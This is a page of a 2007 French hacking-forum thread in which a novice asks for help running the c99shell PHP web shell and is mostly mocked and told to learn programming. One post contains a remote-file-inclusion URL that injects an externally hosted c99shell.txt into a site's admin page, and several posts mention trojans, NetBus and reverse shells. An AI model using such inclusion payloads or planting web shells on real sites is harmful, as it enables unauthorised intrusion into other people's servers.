logo

Knowledge Is Power

- Reinit des nouveaux posts -

- Recherche -

Messages Privés - Derniers posts
S'enregistrer - Login - Liste des membres
Vous logger : Login Pass

Défouloir >> probleme shell99 Newtopic | Topic Locked
1 | 2 | 3 | Page suivante
poster txt
samir93270
Inscrit le 27-08-2007
Posté le 27-08-2007 10:38

je suis nouveau et j ai mis du temps a trouver un forum ou on peut parler hack librement.parce que la hackacademy qui te dit on ne parle pas de trojan ici c est quand mm du foutage de geul. bon voila ma question j ai reussie a trouver ke sois disant shell99 ceci dit au passage sa a ete dur bref.
le probleme c est qu il ne s est ouvert qu une fois et tout etait du genre assez crypter rien a voire avec se que j ai vue sur la video j aimerai avoir un tutoriel bien expliquer oubien une aide d une personne tres gentil est assez patiente lol.
je vous remercie d avance
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 27-08-2007 10:52

Quote:

Le 27-08-2007 10:38, samir93270 a écrit :
je suis nouveau et j ai mis du temps a trouver un forum ou on peut parler hack librement.parce que la hackacademy qui te dit on ne parle pas de trojan ici c est quand mm du foutage de geul. bon voila ma question j ai reussie a trouver ke sois disant shell99 ceci dit au passage sa a ete dur bref.
le probleme c est qu il ne s est ouvert qu une fois et tout etait du genre assez crypter rien a voire avec se que j ai vue sur la video j aimerai avoir un tutoriel bien expliquer oubien une aide d une personne tres gentil est assez patiente lol.
je vous remercie d avance

en faite je l ai uper sur mon serveur ftp mais apres on est sensee ecrire sa :
www.lesfou.com/admin/index.php?vwar_root=http://000.free.fr/c99shell.txt?
mais la a chaque fois rien mm lecran noire et rouge n apparait pas voila parsqu apres m etre relue j ai vue que je m etait mal exprimer dsl.

[ Ce Message a été édité par: samir93270 le 2007-08-27 11:13 ]
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 27-08-2007 11:25

je met le lien de la video ou il explique.

http://fr.youtube.com/watch?v=I9Ccp2JbBv4

APRES SA VS POURREZ M INSULTER D IDIOT QUE JE SUIS LOL .
profil | edit | quote
Borax
Inscrit le 24-08-2001
Posté le 27-08-2007 13:16

Il est vrai que tu mérites ...

Allez, ça part dans le défouloir.
Le trollo manque parfois :]
Inscrit le 27-08-2007
Posté le 28-08-2007 09:21

ok je suis dsl mais svp si vs pouvez repondez mois juste a cet question comment ouvrir cet interface rouge et noir c est tout se que je demande sa me serait d une grande aide donc voila je vs remercie encor a l avance car je sais que je doit faire mal au cerveau.lol
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 29-08-2007 05:08

ok les gars personne ne veut m aider c est pas bien on est tous passer par la sauf que y en a izon pris la routee avant moi lol.serieux les gars de l aide me serai la bienvenue!jdevien fou la jpasse des nuit blanche a essayer de faire marcher ce truc et personne ne veut me dire comment jdemande pas la lune les mec au moin un indice qui me mette sur la voit a bonne entendeur.et merci

[ Ce Message a été édité par: samir93270 le 2007-08-29 05:09 ]
profil | edit | quote
Phant0m
Inscrit le 23-03-2007
Posté le 29-08-2007 06:10

Écoute, je voudrais bien t'aider, d'ailleurs j'avoue que ton histoire m'a intrigué. Mais je ne connais pas ce trojan, et d'ailleurs je ne m'intéresse aux trojans que dans la mesure de leur fabrication. Si j'ai besoin d'en utiliser un, ç'en sera un que j'aurai programmé sur mesure.
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 29-08-2007 06:42

dsl de pas avoir repondue je lisai la partie old school lol?
franchement j adorerai aprendre a programmer des trojan moi meme mais je pense que sa a l air compliquer si tu peut me fair un petit tutoriel ou des conseil sa serait le bienvenue.

ensuite se c99shell n est pas un trojan c est un code php pour acceder a un site et son contenue et c est la que je bloque je n arrive pas a acceder a ct interface comme le type sur sa video donc si quelqu un sait comment faire je le remercie de me donner la reponse et encore merci a phamtom
profil | edit | quote
Zamer
Inscrit le 11-01-2002
Posté le 29-08-2007 12:17

Quote:

Le 27-08-2007 11:25, samir93270 a écrit :

http://fr.youtube.com/watch?v=I9Ccp2JbBv4

APRES SA VS POURREZ M INSULTER D IDIOT QUE JE SUIS LOL .

Pas très reluisants les commentaires de cette vidéo, un exemple :
Quote:
Kikoo!
t0p kool ton ketruc mdr !!!111!!1
Ta tro gérè maic, tro dla ball atomic!!!! LOL
g t expldr sur tou kan ta cliké sur le site vulnérable

fuck kr0$0fT !

profil | Website | MSN | edit | quote
Borax
Inscrit le 24-08-2001
Posté le 29-08-2007 13:44

Merde je pensais que ce genre de paroles étaient réservées à azerty0.
Je dois être trop naïf
Inscrit le 23-03-2007
Posté le 30-08-2007 06:00

Ah, c'est un script php? Alors t'as qu'à trouver un moyen de l'uploader sur le serveur et d'y accéder grâce à son URL! J'espère que t'as essayé ça, lol! Et sinon, ben lis le script! Ça te donnera une idée générale de son fonctionnement.
profil | edit | quote
Phant0m
Inscrit le 23-03-2007
Posté le 30-08-2007 06:01

Ah, et pour la programmation de trojan, c'est pas compliqué. Apprends juste la programmation comme ça, pour t'amuser. Apprends à créer des fonctions et à maîtriser le langage de ton choix. Ensuite, tu n'as qu'à utiliser tes connaissances, c'est juste de l'assemblage, quoi!
profil | edit | quote
PhantomL
Inscrit le 15-03-2004
Posté le 30-08-2007 17:46

Huhuhuhhu...un autre Phantom

Ca fait peuuuuuuuuuuur les forum hantes par des spectres.

Meuuuuuuuuuuuh

Inscrit le 23-03-2007
Posté le 31-08-2007 04:39

Lol! Salut camarade!
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 31-08-2007 07:26

phantom merci de ton aide dsl hier j etait pas la donc tu pourai me dire avec quoi essayer de uploader mon script sur un site et avec quelle logiciel programmer son trojan
et borax franchement tu m ai d aucun eaide a par raconter des connerie trolodrom defouloir c + to toi ki devrai allez se defouler t en a besoin va en vacance chepa moi en tou k merci de ton aide phantom

PS:borax la vie est une ecole et les jours des lecons va mediter un peu et oubli pa kavant d etre bon tu etait mauvais
profil | edit | quote
Borax
Inscrit le 24-08-2001
Posté le 31-08-2007 10:45

Quote:

Le 31-08-2007 07:26, samir93270 a écrit :
et borax franchement tu m ai d aucun eaide a par raconter des connerie trolodrom defouloir c + to toi ki devrai allez se defouler t en a besoin va en vacance chepa moi en tou k merci de ton aide phantom

PS:borax la vie est une ecole et les jours des lecons va mediter un peu et oubli pa kavant d etre bon tu etait mauvais

Cool, je suis en congés ce soir. Maintenant, je doute que ça change grand chose.
Si tu te lisais, tu comprendrais qu'on en ai ras le bol.

Moi je te le dis clairement, tu n'as aucune base.
Apres, si je n'ai pas la délicatesse de t'expliquer certaines choses comme Phantom, c'est parce qu'il y en aurait beaucoup trop à dire, quand on voit tes questions.

Tu galeres a installer easy php ?
Tu ne sais pas coder en PHP ?
Tu galeres pour utiliser netcat ?
Tu n'as pas de bases en réseau ?
Et avec ça, tu te demandes comment faire du reverse binding ?

C'est peut-être toi qui devrait aller à l'école en fin de compte ...
Tu veux des réponses claires ? allez, chiche

Avec quoi coder ton trojan ? Apprend le C, la programmation réseau et la programmation système. Déjà je pense que ça calmera tes ardeurs.
Ensuite, pour uploader, bah apprend à te servir de ncftp ou n'importe quel autre client ftp.
Bouffe un peu de doc aussi au passage sur IP, les protocoles applicatifs batis au dessus, et au moins savoir comment fonctionnent les réseaux ethernet et leurs protocoles sous-jacents (tu peux étudier d'autres couches au niveau liaison aussi ...).
Et au passage, apprends aussi le langage PHP et relis le mauvais code pas indenté que tu as posté.

Le tout sans vidéo, car avec ces putains de videos, tu apprends à te servir d'un truc. Tu n'apprends pas commment il marche. Au lieu de te faire chier avec ton super mega script qui te fait tout, exploite simplement l'include, histoire de voit comment ça marche.
Tu sais, les personnes comme toi, on apelle ça un SK. :]

Voila, maintenant tu te documentes un peu sur ces sujets, j'espère que ça nous laissera un peu de repit.

PS : la compétence, c'est pas une affaire de minutes, mais d'années (avec un cerveau normalement constitué) ...

[ Ce Message a été édité par: Borax le 2007-08-31 10:48 ]
profil | Website | edit | quote
Phant0m
Inscrit le 23-03-2007
Posté le 01-09-2007 04:24

Bien que je veuille t'aider, ce que dit Borax est vrai. Tu dois simplement apprendre, chercher. Je n'ai pas non plus toutes les réponses. Je ne suis pas un expert dans tout. Si je peux aider, je le fais! Mais sérieusement, le meilleur des meilleurs conseils que je puisse te donner est: apprends tous les éléments que tu peux apprendre, et ensuite fais des liens entre eux, mélange-les pour obtenir ce que tu veux. Comprends les failles que peuvent avoir les systèmes, imagines les erreurs qu'ont pu commettre les humains qui ont programmé les ordis ou les ont configurés. Apprends à tout utiliser. C'est comme dans Matrix: tu apprends le ju-jitsu, le saut, le vol de voitures et de motos, le pilotage, le tir, le combat avec toutes les armes. Ensuite, tu te bats contre les agents. Faut y aller pas à pas! La plupart des hackers de génie dont j'aie entendu parler ont commencé l'info tout jeunes. Ils ont pris plusieurs années pour réussir à comprendre assez de choses pour pouvoir faire ce qu'ils ont fait. N'importe qui peut envoyer un trojan à quelqu'un. Mais combien de personnes ont une idée de leur fonctionnement?
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 01-09-2007 10:26

Borax merci pour ta reponse facher lol prend pas la mouche?

Tu galeres a installer easy php ?faux
Tu ne sais pas coder en PHP ?vrai
Tu galeres pour utiliser netcat ?faux j ai un bon tutoriel mais sa ne marche pas sur les site on dirai
Tu n'as pas de bases en réseau ?vrai
Et avec ça, tu te demandes comment faire du reverse binding ?je m y interesse je n ai pas dit que je voulai le faire perso si jdoit trojaner quelqu un j utiliserai netbus bocoup + simple mais en se moment se qui m interesse c est les sites les pc de particulier c pas trop mon truc quoi donc voila mais merci quand mm Borax
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 01-09-2007 10:29

merci phantom je vais regarder matrix alors les trois lol non bah je vais me metre a aprendre a programmer des script ensuite j a prendrai le c et le c ++ mais sa risque d etre long j espere que vs pourai m aider ok .merci de ta gentillesse phantom et a bientot si j ai une galere je reposte .
profil | edit | quote
samir93270
Inscrit le 27-08-2007
Posté le 01-09-2007 13:07

borax la je doit admetre que j ai besoin de toi mon script s ouvre miracle avec firefox.j ai ouvert le script avec firefox mais sa a pas l air bien ecrit tu pourai me dire quelle sont les ligne a corriger pour que je puisse enfin m en servir.merci d avance
profil | edit | quote
Newtopic | Topic Locked 1 | 2 | 3 | Page suivante

Online : AbnohalwabTheope, abzawovuruq, afbblofs, Agustinwhase, Alexvef, apvekohoc, ArchieVuT, Cameroncok, Carolbiada, Cetetedehab, ebecewuyoamap, ecenomot, ewocawuun, idepeqb, JamesAcisk, JamyMica, Keithmex, onoppii, SamuelVek, sbhuNavy, uzofufahipoj, varaben, WalterFlozy et 59 Guests

Retour Index NewFFR Repository : http://taz.newffr.com
Cagades à Stick : http://alcane.newffr.com
Forum HTML et Archive -> ici
ForumFR Sql/Xml (2006/04) (SF pas à jour du tout...) - Alive since 2001 Newffr.com
Pour toute plainte ou problème -> Contacter Borax, Hyatus, Tweakie ou Stick par message privé (ou Gueulez sur le forum :) )
Retour haut de page